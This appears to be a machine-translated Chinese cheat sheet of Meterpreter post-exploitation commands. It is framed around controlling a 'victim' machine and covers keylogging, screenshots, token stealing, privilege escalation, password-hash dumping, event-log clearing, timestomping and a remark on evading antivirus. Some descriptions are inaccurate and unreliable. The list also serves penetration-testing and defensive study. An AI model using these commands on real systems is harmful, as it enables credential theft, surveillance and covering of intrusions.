在其最基本的使用,meterpreter 是一個 Linux 終端在受害者的計算機上。這樣,我們的許多基本的Linux命令可以用在meterpreter甚至是在一個窗口或其他操作系統。
這里有一些核心的命令可以用在meterpreter。
- ? – 幫助菜單
- background – 將當前會話移動到背景
- bgkill – 殺死一個背景 meterpreter 腳本
- bglist – 提供所有正在運行的后台腳本的列表
- bgrun – 作為一個后台線程運行腳本
- channel – 顯示活動頻道
- close – 關閉通道
- exit – 終止 meterpreter 會話
- help – 幫助菜單
- interact – 與通道進行交互
- irb – 進入 Ruby 腳本模式
- migrate – 移動到一個指定的 PID 的活動進程
- quit – 終止 meterpreter 會話
- read – 從通道讀取數據
- run – 執行以后它選定的 meterpreter 腳本
- use – 加載 meterpreter 的擴展
- write – 將數據寫入到一個通道
第2步:文件系統命令
- cat -讀取並輸出到標准輸出文件的內容
- cd -更改目錄對受害人
- del -刪除文件對受害人
- download-從受害者系統文件下載
- edit-用 vim編輯文件
- getlwd -打印本地目錄
- getwd -打印工作目錄
- lcd -更改本地目錄
- lpwd -打印本地目錄
- ls -列出在當前目錄中的文件列表
- mkdir -在受害者系統上的創建目錄
- pwd -輸出工作目錄
- rm -刪除文件
- rmdir -受害者系統上刪除目錄
- upload-從攻擊者的系統往受害者系統上傳文件
第 3 步: 網絡命令
- ipconfig -顯示網絡接口的關鍵信息,包括 IP 地址、 等。
- portfwd -端口轉發
- route -查看或修改受害者路由表
第 4 步: 系統命令
- clearav -清除了受害者的計算機上的事件日志
- drop_token -被盜的令牌
- execute-執行命令
- getpid -獲取當前進程 ID (PID)
- getprivs -盡可能獲取盡可能多的特權
- getuid -獲取作為運行服務器的用戶
- kill -終止指定 PID 的進程
- ps -列出正在運行的進程
- reboot-重新啟動受害人的計算機
- reg -與受害人的注冊表進行交互
- rev2self -在受害者機器上調用 RevertToSelf()
- shell -在受害者計算機上打開一個shell
- shutdown-關閉了受害者的計算機
- steal_token -試圖竊取指定的 (PID) 進程的令牌
- sysinfo -獲取有關受害者計算機操作系統和名稱等的詳細信息
第 5 步: 用戶界面命令
- enumdesktops -列出所有可訪問台式機
- getdesktop -獲取當前的 meterpreter 桌面
- idletime -檢查長時間以來,受害者系統空閑進程
- keyscan_dump -鍵盤記錄軟件的內容轉儲
- keyscan_start -啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件
- keyscan_stop -停止鍵盤記錄軟件
- screenshot-抓去 meterpreter 桌面的屏幕截圖
- set_desktop -更改 meterpreter 桌面
- uictl -啟用用戶界面組件的一些控件
第 6 步: 特權升級命令
- getsystem -獲得系統管理員權限
第 7 步: 密碼轉儲命令
- hashdump -抓去哈希密碼 (SAM) 文件中的值
請注意 hashdump 會可以跳過殺毒軟件,但現在有兩個腳本,都更加隱蔽,”run hashdump”和”run smart_hashdump”。查找更多關於那些在我即將舉行的 meterpreter 腳本作弊。
第 8 步: Timestomp 命令
- timestomp -操作修改,訪問,並創建一個文件的屬性